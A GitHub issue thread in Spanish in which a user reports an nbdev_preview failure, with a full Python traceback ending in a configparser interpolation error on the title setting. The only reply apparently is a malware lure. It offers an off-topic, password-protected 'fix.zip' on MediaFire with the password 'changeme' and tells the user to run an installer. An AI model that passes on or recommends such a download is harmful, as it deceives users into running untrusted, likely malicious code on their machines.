### ISSUE TITLE
Error al correr el nbdev_preview (luego de que ya había funcionado)

### ISSUE THREAD

**Issue by benjaminserrano23** [dci-courses/DatosBook#16]
Luego de haber tenido la pagina web ya lista y funcionando, quise probar cerrando el miniforge 3 y luego al abrirlo de nuevo y correr el nbdev_preview me arrojó lo siguiente:
(ing-datos) D:\escritorio\UFRO\Ingenieria Informatica\AHORA\Ingeniería de Datos>nbdev_preview
Traceback (most recent call last):
  File "<frozen runpy>", line 198, in _run_module_as_main
  File "<frozen runpy>", line 88, in _run_code
  File "C:\Python312\Scripts\nbdev_preview.exe\__main__.py", line 7, in <module>
  File "C:\Python312\Lib\site-packages\fastcore\script.py", line 119, in _f
    return tfunc(**merge(args, args_from_prog(func, xtra)))
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Python312\Lib\site-packages\nbdev\quarto.py", line 323, in nbdev_preview
    cache,cfg,path = _pre_docs(path, n_workers=n_workers, **kwargs)
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Python312\Lib\site-packages\nbdev\quarto.py", line 202, in _pre_docs
    refresh_quarto_yml()
  File "C:\Python312\Lib\site-packages\nbdev\quarto.py", line 182, in refresh_quarto_yml
    vals = {k:cfg[k] for k in ['title', 'description', 'branch', 'git_url', 'doc_host', 'doc_baseurl']}
              ~~~^^^
  File "C:\Python312\Lib\site-packages\fastcore\foundation.py", line 273, in __getitem__
    def __getitem__(self,k):   return stop(IndexError(k)) if k not in self.d else self.get(k)
                                                                                  ^^^^^^^^^^^
  File "C:\Python312\Lib\site-packages\fastcore\foundation.py", line 276, in get
    v = self.d.get(k, default)
        ^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Python312\Lib\configparser.py", line 1273, in get
    return _impl(self._name, option, raw=raw, vars=vars,
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Python312\Lib\configparser.py", line 777, in get
    return self._interpolation.before_get(self, section, option, value,
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Python312\Lib\configparser.py", line 367, in before_get
    self._interpolate_some(parser, option, L, value, section, defaults, 1)
  File "C:\Python312\Lib\configparser.py", line 409, in _interpolate_some
    self._interpolate_some(parser, option, accum, v,
  File "C:\Python312\Lib\configparser.py", line 406, in _interpolate_some
    raise InterpolationMissingOptionError(
configparser.InterpolationMissingOptionError: Bad value substitution: option 'title' in section 'DEFAULT' contains an interpolation key 'repo' which is not a valid option name. Raw value: '%(lib_name)s'

**Comment by scheichreisuli** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
